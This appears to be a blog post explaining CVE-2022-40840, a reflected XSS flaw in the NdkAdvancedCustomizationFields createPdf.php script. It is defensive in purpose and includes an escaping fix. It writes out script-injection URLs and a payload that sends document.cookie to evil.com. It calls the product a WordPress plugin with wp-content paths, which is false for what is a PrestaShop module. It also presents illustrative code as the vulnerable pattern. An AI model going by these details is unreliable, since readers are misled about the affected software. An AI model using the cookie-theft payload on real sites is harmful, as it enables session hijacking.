CVE-2022-40840 - XSS Vulnerability in ndk design NdkAdvancedCustomizationFields 3.5. via createPdf.php

In September 2022, a critical Cross-Site Scripting (XSS) vulnerability was discovered in the plugin NdkAdvancedCustomizationFields version 3.5., developed by ndk design. This vulnerability is tracked as CVE-2022-40840. The XSS issue allows attackers to execute arbitrary JavaScript in the context of users accessing the createPdf.php endpoint, potentially leading to session hijacking, phishing, and other malicious actions.

In this post, we'll break down how the vulnerability works, show a simplified exploit example, and discuss how to mitigate the issue. All of it will be in clear, easy-to-understand language.

What is NdkAdvancedCustomizationFields?

NdkAdvancedCustomizationFields is a WordPress plugin used to create advanced custom fields for content management. Its createPdf.php script is designed to generate PDFs based on user input.

How Bad is This Vulnerability?

Because createPdf.php does not properly sanitize user input, attackers can inject malicious JavaScript code via parameters. When the PDF is generated, the injected script can execute in the victim's browser if they are tricked into visiting a malicious link or opening a generated PDF.

Here's a simplified version of the typical vulnerable pattern in createPdf.php

// createPdf.php

echo "<h2>User Name: " . $_GET['username'] . "</h2>";

The code above takes input directly from the URL parameter username and prints it into an HTML response without sanitization or escaping.

An attacker can exploit this by constructing a URL like the following

https://targetsite.com/wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=<script>alert('XSS')</script>;

When a user visits this URL, the malicious JavaScript will execute because it's directly rendered into the page. No authentication is needed.

Here's a live demonstration (for educational purposes only!)

1. Attacker crafts this URL:
   https://victim.com/wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=<script>alert('Hacked!')</script>;

2. Victim clicks the link.

3. Victim sees an alert box with 'Hacked!', proving JavaScript ran in their browser.

4. The attacker could replace the alert() with any script—for example, to steal cookies:
   <script>document.location='https://evil.com/steal?c='+document.cookie</script>;

Example Fix

echo "<h2>User Name: " . htmlspecialchars($_GET['username'], ENT_QUOTES, 'UTF-8') . "</h2>";

References & Further Reading

- Official CVE Entry - CVE-2022-40840
- Exploit Database: 51481 (exploit details)
- NdkAdvancedCustomizationFields Plugin Page
- OWASP XSS Prevention Cheat Sheet

Final Thoughts

CVE-2022-40840 is a serious XSS flaw that puts sites and users at risk when running vulnerable versions of ndk design NdkAdvancedCustomizationFields. If you run this plugin, patch it now and review your PHP code for unsanitized output. Remember, never trust user input—sanitize and escape it every time.

Timeline

Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/03/2022 13:53:00 UTC